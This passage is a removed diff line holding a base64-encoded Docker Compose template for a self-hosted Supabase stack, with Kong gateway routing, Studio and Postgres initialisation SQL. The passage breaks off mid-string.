-        "compose": "c2VydmljZXM6CiAgc3VwYWJhc2Uta29uZzoKICAgIGltYWdlOiAna29uZzoyLjguMScKICAgIGVudHJ5cG9pbnQ6ICdiYXNoIC1jICcnZXZhbCAiZWNobyBcIiQkKGNhdCB+L3RlbXAueW1sKVwiIiA+IH4va29uZy55bWwgJiYgL2RvY2tlci1lbnRyeXBvaW50LnNoIGtvbmcgZG9ja2VyLXN0YXJ0JycnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9TVVBBQkFTRUtPTkdfODAwMAogICAgICAtICdLT05HX1BPUlRfTUFQUz00NDM6ODAwMCcKICAgICAgLSAnSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSBLT05HX0RBVEFCQVNFPW9mZgogICAgICAtIEtPTkdfREVDTEFSQVRJVkVfQ09ORklHPS9ob21lL2tvbmcva29uZy55bWwKICAgICAgLSAnS09OR19ETlNfT1JERVI9TEFTVCxBLENOQU1FJwogICAgICAtICdLT05HX1BMVUdJTlM9cmVxdWVzdC10cmFuc2Zvcm1lcixjb3JzLGtleS1hdXRoLGFjbCxiYXNpYy1hdXRoJwogICAgICAtIEtPTkdfTkdJTlhfUFJPWFlfUFJPWFlfQlVGRkVSX1NJWkU9MTYwawogICAgICAtICdLT05HX05HSU5YX1BST1hZX1BST1hZX0JVRkZFUlM9NjQgMTYwaycKICAgICAgLSAnU1VQQUJBU0VfQU5PTl9LRVk9JHtTRVJWSUNFX1NVUEFCQVNFQU5PTl9LRVl9JwogICAgICAtICdTVVBBQkFTRV9TRVJWSUNFX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VTRVJWSUNFX0tFWX0nCiAgICAgIC0gJ0RBU0hCT0FSRF9VU0VSTkFNRT0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ0RBU0hCT0FSRF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQURNSU59JwogICAgdm9sdW1lczoKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9hcGkva29uZy55bWwKICAgICAgICB0YXJnZXQ6IC9ob21lL2tvbmcvdGVtcC55bWwKICAgICAgICBjb250ZW50OiAiX2Zvcm1hdF92ZXJzaW9uOiAnMi4xJ1xuX3RyYW5zZm9ybTogdHJ1ZVxuXG4jIyNcbiMjIyBDb25zdW1lcnMgLyBVc2Vyc1xuIyMjXG5jb25zdW1lcnM6XG4gIC0gdXNlcm5hbWU6IERBU0hCT0FSRFxuICAtIHVzZXJuYW1lOiBhbm9uXG4gICAga2V5YXV0aF9jcmVkZW50aWFsczpcbiAgICAgIC0ga2V5OiAkU1VQQUJBU0VfQU5PTl9LRVlcbiAgLSB1c2VybmFtZTogc2VydmljZV9yb2xlXG4gICAga2V5YXV0aF9jcmVkZW50aWFsczpcbiAgICAgIC0ga2V5OiAkU1VQQUJBU0VfU0VSVklDRV9LRVlcblxuIyMjXG4jIyMgQWNjZXNzIENvbnRyb2wgTGlzdFxuIyMjXG5hY2xzOlxuICAtIGNvbnN1bWVyOiBhbm9uXG4gICAgZ3JvdXA6IGFub25cbiAgLSBjb25zdW1lcjogc2VydmljZV9yb2xlXG4gICAgZ3JvdXA6IGFkbWluXG5cbiMjI1xuIyMjIERhc2hib2FyZCBjcmVkZW50aWFsc1xuIyMjXG5iYXNpY2F1dGhfY3JlZGVudGlhbHM6XG4tIGNvbnN1bWVyOiBEQVNIQk9BUkRcbiAgdXNlcm5hbWU6ICREQVNIQk9BUkRfVVNFUk5BTUVcbiAgcGFzc3dvcmQ6ICREQVNIQk9BUkRfUEFTU1dPUkRcblxuXG4jIyNcbiMjIyBBUEkgUm91dGVzXG4jIyNcbnNlcnZpY2VzOlxuXG4gICMjIE9wZW4gQXV0aCByb3V0ZXNcbiAgLSBuYW1lOiBhdXRoLXYxLW9wZW5cbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1hdXRoOjk5OTkvdmVyaWZ5XG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBhdXRoLXYxLW9wZW5cbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9hdXRoL3YxL3ZlcmlmeVxuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgLSBuYW1lOiBhdXRoLXYxLW9wZW4tY2FsbGJhY2tcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1hdXRoOjk5OTkvY2FsbGJhY2tcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtb3Blbi1jYWxsYmFja1xuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2F1dGgvdjEvY2FsbGJhY2tcbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gIC0gbmFtZTogYXV0aC12MS1vcGVuLWF1dGhvcml6ZVxuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS9hdXRob3JpemVcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtb3Blbi1hdXRob3JpemVcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9hdXRoL3YxL2F1dGhvcml6ZVxuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcblxuICAjIyBTZWN1cmUgQXV0aCByb3V0ZXNcbiAgLSBuYW1lOiBhdXRoLXYxXG4gICAgX2NvbW1lbnQ6ICdHb1RydWU6IC9hdXRoL3YxLyogLT4gaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvYXV0aC92MS9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiBmYWxzZVxuICAgICAgLSBuYW1lOiBhY2xcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfZ3JvdXBzX2hlYWRlcjogdHJ1ZVxuICAgICAgICAgIGFsbG93OlxuICAgICAgICAgICAgLSBhZG1pblxuICAgICAgICAgICAgLSBhbm9uXG5cbiAgIyMgU2VjdXJlIFJFU1Qgcm91dGVzXG4gIC0gbmFtZTogcmVzdC12MVxuICAgIF9jb21tZW50OiAnUG9zdGdSRVNUOiAvcmVzdC92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvKidcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiByZXN0LXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL3Jlc3QvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogdHJ1ZVxuICAgICAgLSBuYW1lOiBhY2xcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfZ3JvdXBzX2hlYWRlcjogdHJ1ZVxuICAgICAgICAgIGFsbG93OlxuICAgICAgICAgICAgLSBhZG1pblxuICAgICAgICAgICAgLSBhbm9uXG5cbiAgIyMgU2VjdXJlIEdyYXBoUUwgcm91dGVzXG4gIC0gbmFtZTogZ3JhcGhxbC12MVxuICAgIF9jb21tZW50OiAnUG9zdGdSRVNUOiAvZ3JhcGhxbC92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvcnBjL2dyYXBocWwnXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtcmVzdDozMDAwL3JwYy9ncmFwaHFsXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBncmFwaHFsLXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2dyYXBocWwvdjFcbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiB0cnVlXG4gICAgICAtIG5hbWU6IHJlcXVlc3QtdHJhbnNmb3JtZXJcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGFkZDpcbiAgICAgICAgICAgIGhlYWRlcnM6XG4gICAgICAgICAgICAgIC0gQ29udGVudC1Qcm9maWxlOmdyYXBocWxfcHVibGljXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cblxuICAjIyBTZWN1cmUgUmVhbHRpbWUgcm91dGVzXG4gIC0gbmFtZTogcmVhbHRpbWUtdjEtd3NcbiAgICBfY29tbWVudDogJ1JlYWx0aW1lOiAvcmVhbHRpbWUvdjEvKiAtPiB3czovL3JlYWx0aW1lOjQwMDAvc29ja2V0LyonXG4gICAgdXJsOiBodHRwOi8vcmVhbHRpbWUtZGV2OjQwMDAvc29ja2V0XG4gICAgcHJvdG9jb2w6IHdzXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiByZWFsdGltZS12MS13c1xuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL3JlYWx0aW1lL3YxL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IGZhbHNlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cbiAgLSBuYW1lOiByZWFsdGltZS12MS1yZXN0XG4gICAgX2NvbW1lbnQ6ICdSZWFsdGltZTogL3JlYWx0aW1lL3YxLyogLT4gd3M6Ly9yZWFsdGltZTo0MDAwL3NvY2tldC8qJ1xuICAgIHVybDogaHR0cDovL3JlYWx0aW1lLWRldjo0MDAwL2FwaVxuICAgIHByb3RvY29sOiBodHRwXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiByZWFsdGltZS12MS1yZXN0XG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcmVhbHRpbWUvdjEvYXBpXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogZmFsc2VcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cbiAgICAgICAgICAgIC0gYW5vblxuXG4gICMjIFN0b3JhZ2Ugcm91dGVzOiB0aGUgc3RvcmFnZSBzZXJ2ZXIgbWFuYWdlcyBpdHMgb3duIGF1dGhcbiAgLSBuYW1lOiBzdG9yYWdlLXYxXG4gICAgX2NvbW1lbnQ6ICdTdG9yYWdlOiAvc3RvcmFnZS92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1zdG9yYWdlOjUwMDAvKidcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1zdG9yYWdlOjUwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBzdG9yYWdlLXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL3N0b3JhZ2UvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuXG4gICMjIEVkZ2UgRnVuY3Rpb25zIHJvdXRlc1xuICAtIG5hbWU6IGZ1bmN0aW9ucy12MVxuICAgIF9jb21tZW50OiAnRWRnZSBGdW5jdGlvbnM6IC9mdW5jdGlvbnMvdjEvKiAtPiBodHRwOi8vc3VwYWJhc2UtZWRnZS1mdW5jdGlvbnM6OTAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWVkZ2UtZnVuY3Rpb25zOjkwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBmdW5jdGlvbnMtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvZnVuY3Rpb25zL3YxL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcblxuICAjIyBBbmFseXRpY3Mgcm91dGVzXG4gIC0gbmFtZTogYW5hbHl0aWNzLXYxXG4gICAgX2NvbW1lbnQ6ICdBbmFseXRpY3M6IC9hbmFseXRpY3MvdjEvKiAtPiBodHRwOi8vbG9nZmxhcmU6NDAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYW5hbHl0aWNzLXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2FuYWx5dGljcy92MS9cblxuICAjIyBTZWN1cmUgRGF0YWJhc2Ugcm91dGVzXG4gIC0gbmFtZTogbWV0YVxuICAgIF9jb21tZW50OiAncGctbWV0YTogL3BnLyogLT4gaHR0cDovL3N1cGFiYXNlLW1ldGE6ODA4MC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLW1ldGE6ODA4MC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IG1ldGEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcGcvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IGZhbHNlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG5cbiAgIyMgUHJvdGVjdGVkIERhc2hib2FyZCAtIGNhdGNoIGFsbCByZW1haW5pbmcgcm91dGVzXG4gIC0gbmFtZTogZGFzaGJvYXJkXG4gICAgX2NvbW1lbnQ6ICdTdHVkaW86IC8qIC0+IGh0dHA6Ly9zdHVkaW86MzAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLXN0dWRpbzozMDAwL1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogZGFzaGJvYXJkLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZTogYmFzaWMtYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogdHJ1ZVxuIgogIHN1cGFiYXNlLXN0dWRpbzoKICAgIGltYWdlOiAnc3VwYWJhc2Uvc3R1ZGlvOjIwMjUuMDYuMDItc2hhLThmMjk5M2QnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gbm9kZQogICAgICAgIC0gJy1lJwogICAgICAgIC0gImZldGNoKCdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL3BsYXRmb3JtL3Byb2ZpbGUnKS50aGVuKChyKSA9PiB7aWYgKHIuc3RhdHVzICE9PSAyMDApIHRocm93IG5ldyBFcnJvcihyLnN0YXR1cyl9KSIKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSE9TVE5BTUU9MC4wLjAuMAogICAgICAtICdTVFVESU9fUEdfTUVUQV9VUkw9aHR0cDovL3N1cGFiYXNlLW1ldGE6ODA4MCcKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnREVGQVVMVF9PUkdBTklaQVRJT05fTkFNRT0ke1NUVURJT19ERUZBVUxUX09SR0FOSVpBVElPTjotRGVmYXVsdCBPcmdhbml6YXRpb259JwogICAgICAtICdERUZBVUxUX1BST0pFQ1RfTkFNRT0ke1NUVURJT19ERUZBVUxUX1BST0pFQ1Q6LURlZmF1bHQgUHJvamVjdH0nCiAgICAgIC0gJ1NVUEFCQVNFX1VSTD1odHRwOi8vc3VwYWJhc2Uta29uZzo4MDAwJwogICAgICAtICdTVVBBQkFTRV9QVUJMSUNfVVJMPSR7U0VSVklDRV9GUUROX1NVUEFCQVNFS09OR30nCiAgICAgIC0gJ1NVUEFCQVNFX0FOT05fS0VZPSR7U0VSVklDRV9TVVBBQkFTRUFOT05fS0VZfScKICAgICAgLSAnU1VQQUJBU0VfU0VSVklDRV9LRVk9JHtTRVJWSUNFX1NVUEFCQVNFU0VSVklDRV9LRVl9JwogICAgICAtICdBVVRIX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ0xPR0ZMQVJFX0FQSV9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0xPR0ZMQVJFfScKICAgICAgLSAnTE9HRkxBUkVfVVJMPWh0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMCcKICAgICAgLSAnU1VQQUJBU0VfUFVCTElDX0FQST0ke1NFUlZJQ0VfRlFETl9TVVBBQkFTRUtPTkd9JwogICAgICAtIE5FWFRfUFVCTElDX0VOQUJMRV9MT0dTPXRydWUKICAgICAgLSBORVhUX0FOQUxZVElDU19CQUNLRU5EX1BST1ZJREVSPXBvc3RncmVzCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogIHN1cGFiYXNlLWRiOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9wb3N0Z3JlczoxNS44LjEuMDQ4JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICdwZ19pc3JlYWR5IC1VIHBvc3RncmVzIC1oIDEyNy4wLjAuMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS12ZWN0b3I6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGNvbW1hbmQ6CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSAnLWMnCiAgICAgIC0gY29uZmlnX2ZpbGU9L2V0Yy9wb3N0Z3Jlc3FsL3Bvc3RncmVzcWwuY29uZgogICAgICAtICctYycKICAgICAgLSBsb2dfbWluX21lc3NhZ2VzPWZhdGFsCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19IT1NUPS92YXIvcnVuL3Bvc3RncmVzcWwKICAgICAgLSAnUEdQT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BPU1RHUkVTX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUEdQQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQR0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdKV1RfRVhQPSR7SldUX0VYUElSWTotMzYwMH0nCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBhYmFzZS1kYi1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9yZWFsdGltZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk5LXJlYWx0aW1lLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXG5jcmVhdGUgc2NoZW1hIGlmIG5vdCBleGlzdHMgX3JlYWx0aW1lO1xuYWx0ZXIgc2NoZW1hIF9yZWFsdGltZSBvd25lciB0byA6cGd1c2VyO1xuIgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2RiL19zdXBhYmFzZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk3LV9zdXBhYmFzZS5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwiJFBPU1RHUkVTX1VTRVJcImBcblxuQ1JFQVRFIERBVEFCQVNFIF9zdXBhYmFzZSBXSVRIIE9XTkVSIDpwZ3VzZXI7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcG9vbGVyLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktcG9vbGVyLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXFxjIF9zdXBhYmFzZVxuY3JlYXRlIHNjaGVtYSBpZiBub3QgZXhpc3RzIF9zdXBhdmlzb3I7XG5hbHRlciBzY2hlbWEgX3N1cGF2aXNvciBvd25lciB0byA6cGd1c2VyO1xuXFxjIHBvc3RncmVzXG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvd2ViaG9va3Muc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk4LXdlYmhvb2tzLnNxbAogICAgICAgIGNvbnRlbnQ6ICJCRUdJTjtcbi0tIENyZWF0ZSBwZ19uZXQgZXh0ZW5zaW9uXG5DUkVBVEUgRVhURU5TSU9OIElGIE5PVCBFWElTVFMgcGdfbmV0IFNDSEVNQSBleHRlbnNpb25zO1xuLS0gQ3JlYXRlIHN1cGFiYXNlX2Z1bmN0aW9ucyBzY2hlbWFcbkNSRUFURSBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIEFVVEhPUklaQVRJT04gc3VwYWJhc2VfYWRtaW47XG5HUkFOVCBVU0FHRSBPTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gVEFCTEVTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gRlVOQ1RJT05TIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gU0VRVUVOQ0VTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMubWlncmF0aW9ucyBkZWZpbml0aW9uXG5DUkVBVEUgVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLm1pZ3JhdGlvbnMgKFxuICB2ZXJzaW9uIHRleHQgUFJJTUFSWSBLRVksXG4gIGluc2VydGVkX2F0IHRpbWVzdGFtcHR6IE5PVCBOVUxMIERFRkFVTFQgTk9XKClcbik7XG4tLSBJbml0aWFsIHN1cGFiYXNlX2Z1bmN0aW9ucyBtaWdyYXRpb25cbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCdpbml0aWFsJyk7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMuaG9va3MgZGVmaW5pdGlvblxuQ1JFQVRFIFRBQkxFIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyAoXG4gIGlkIGJpZ3NlcmlhbCBQUklNQVJZIEtFWSxcbiAgaG9va190YWJsZV9pZCBpbnRlZ2VyIE5PVCBOVUxMLFxuICBob29rX25hbWUgdGV4dCBOT1QgTlVMTCxcbiAgY3JlYXRlZF9hdCB0aW1lc3RhbXB0eiBOT1QgTlVMTCBERUZBVUxUIE5PVygpLFxuICByZXF1ZXN0X2lkIGJpZ2ludFxuKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfcmVxdWVzdF9pZF9pZHggT04gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIFVTSU5HIGJ0cmVlIChyZXF1ZXN0X2lkKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfaF90YWJsZV9pZF9oX25hbWVfaWR4IE9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyBVU0lORyBidHJlZSAoaG9va190YWJsZV9pZCwgaG9va19uYW1lKTtcbkNPTU1FTlQgT04gVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIElTICdTdXBhYmFzZSBGdW5jdGlvbnMgSG9va3M6IEF1ZGl0IHRyYWlsIGZvciB0cmlnZ2VyZWQgaG9va3MuJztcbkNSRUFURSBGVU5DVElPTiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KClcbiAgUkVUVVJOUyB0cmlnZ2VyXG4gIExBTkdVQUdFIHBscGdzcWxcbiAgQVMgJGZ1bmN0aW9uJFxuICBERUNMQVJFXG4gICAgcmVxdWVzdF9pZCBiaWdpbnQ7XG4gICAgcGF5bG9hZCBqc29uYjtcbiAgICB1cmwgdGV4dCA6PSBUR19BUkdWWzBdOjp0ZXh0O1xuICAgIG1ldGhvZCB0ZXh0IDo9IFRHX0FSR1ZbMV06OnRleHQ7XG4gICAgaGVhZGVycyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHBhcmFtcyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHRpbWVvdXRfbXMgaW50ZWdlciBERUZBVUxUIDEwMDA7XG4gIEJFR0lOXG4gICAgSUYgdXJsIElTIE5VTEwgT1IgdXJsID0gJ251bGwnIFRIRU5cbiAgICAgIFJBSVNFIEVYQ0VQVElPTiAndXJsIGFyZ3VtZW50IGlzIG